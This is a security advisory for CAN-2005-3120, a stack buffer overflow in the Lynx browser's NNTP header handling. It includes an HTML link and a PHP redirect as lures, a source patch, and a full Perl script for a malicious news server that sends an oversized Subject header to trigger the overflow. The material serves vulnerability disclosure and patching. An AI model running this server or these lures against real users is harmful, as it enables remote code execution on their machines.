|
|
|
|
| |
"Lynx is a fully-featured World Wide Web (WWW) client for users running cursor-addressable, character-cell display devices (e.g. vt100 terminals, vt100 emulators running on PCs or Macs, or any other character-cell display)."
Lynx does not verify the length of buffer it copies allowing remote attackers to execute arbitrary code using buffer overflow in Lynx's NNTP support. |
| |
Credit:
The information has been provided by Ulf Harnhammar.
|
| |
Vulnerable Systems:
* Lynx version 2.8.5
* Lynx version 2.8.6dev.13
* Lynx version 2.8.4
* Lynx version 2.8.3
* Lynx version 2.8.2
When Lynx connects to an NNTP server to fetch information about the available articles in a newsgroup, it will call a function called HTrjis() with the information from certain article headers. The function adds missing ESC characters to certain data, to support Asian character sets. However, it does not check if it writes outside of the char array buf, and that causes a stack-based buffer overflow, with full control over EIP, EBX, EBP, ESI and EDI.
Two attack vectors to make a victim visit a URL to a dangerous news server are: (a) *links in web pages*, where the victim visits some web page and selects a link on the page to a malicious URL, and (b) *redirecting scripts*, where the victim visits a URL and it redirects automatically to a malicious URL. Attack vector (a) is helped by the fact that Lynx does not automatically display where links lead to, unlike many graphical web browsers.
Victims are in danger when their Lynx session is forced to visit a URL of the types "nntp://some.news.server/group.name" or "news:group.name", and the server that Lynx connects to must send back article headers with certain malicious data. It may be possible to make real news servers distribute such articles without technical problems, but that has not been tested.
Proof of Concept 1:
< html>
< head>
< title>lynx test< /title>
< /head>
< body>
< a href="nntp://malicious.news.server/alt.angst">Click me!< /a>
< /body>
< /html>
Proof of Concept 2:
< ? php
header('Location: nntp://malicious.news.server/alt.angst');
? >
Possible Patch:
--- WWW/Library/Implementation/HTMIME.c.old 2004-01-08 03:03:09.000000000 +0100
+++ WWW/Library/Implementation/HTMIME.c 2005-09-25 17:25:02.499592560 +0200
@@ -2230,7 +2230,7 @@ PUBLIC int HTrjis ARGS2(
strcpy(t, s);
return 1;
}
- for (p = buf; *s; ) {
+ for (p = buf; *s && p < buf + LINE_LENGTH - 8; ) {
if (!kanji && s[0] == '$' && (s[1] == '@' || s[1] == 'B')) {
if (HTmaybekanji((int)s[2], (int)s[3])) {
kanji = 1;
@@ -2253,7 +2253,7 @@ PUBLIC int HTrjis ARGS2(
}
*p++ = *s++;
}
- *p = *s; /* terminate string */
+ *p = '\0'; /* terminate string */
strcpy(t, buf);
return 0;
CVE Information:
CAN-2005-3120
Exploit:
#!/usr/bin/perl --
# lynx-nntp-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.
use strict;
use IO::Socket;
$main::port = 119;
$main::timeout = 5;
# *** SUBROUTINES ***
sub mysend($$)
{
my $file = shift;
my $str = shift;
print $file "$str\n";
print "SENT: $str\n";
} # sub mysend
sub myreceive($)
{
my $file = shift;
my $inp;
eval
{
local $SIG{ALRM} = sub { die "alarm\n" };
alarm $main::timeout;
$inp = <$file>;
alarm 0;
};
if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
$inp =~ tr/\015\012\000//d;
print "RECEIVED: $inp\n";
$inp;
} # sub myreceive
# *** MAIN PROGRAM ***
{
my $server = IO::Socket::INET->new( Proto => 'tcp',
LocalPort => $main::port,
Listen => SOMAXCONN,
Reuse => 1);
die "can't set up server!\n" unless $server;
while (my $client = $server->accept())
{
$client->autoflush(1);
print 'connection from '.$client->peerhost."\n";
mysend($client, '200 Internet News');
my $group = 'alt.angst';
while (my $str = myreceive($client))
{
if ($str =~ m/^mode reader$/i)
{
mysend($client, '200 Internet News');
next;
}
if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i)
{
$group = $1;
mysend($client, "211 1 1 1 $group");
next;
}
if ($str =~ m/^quit$/i)
{
mysend($client, '205 Goodbye');
last;
}
if ($str =~ m/^head ([0-9]+)$/i)
{
my $evil = '$@UU(JUU' x 21; # Edit the number!
$evil .= 'U' x (504 - length $evil);
my $head = <<HERE;
221 $1 <xyzzy\@usenet.qx>
Path: host!someotherhost!onemorehost
From: <mr_talkative\@usenet.qx>
Subject: $evil
Newsgroup: $group
Message-ID: <xyzzy\@usenet.qx>
.
HERE
$head =~ s|\s+$||s;
mysend($client, $head);
next;
}
mysend($client, '500 Syntax Error');
} # while str=myreceive(client)
close $client;
print "closed\n\n\n";
} # while client=server->accept()
}
#EoF
|
|
|
|
|
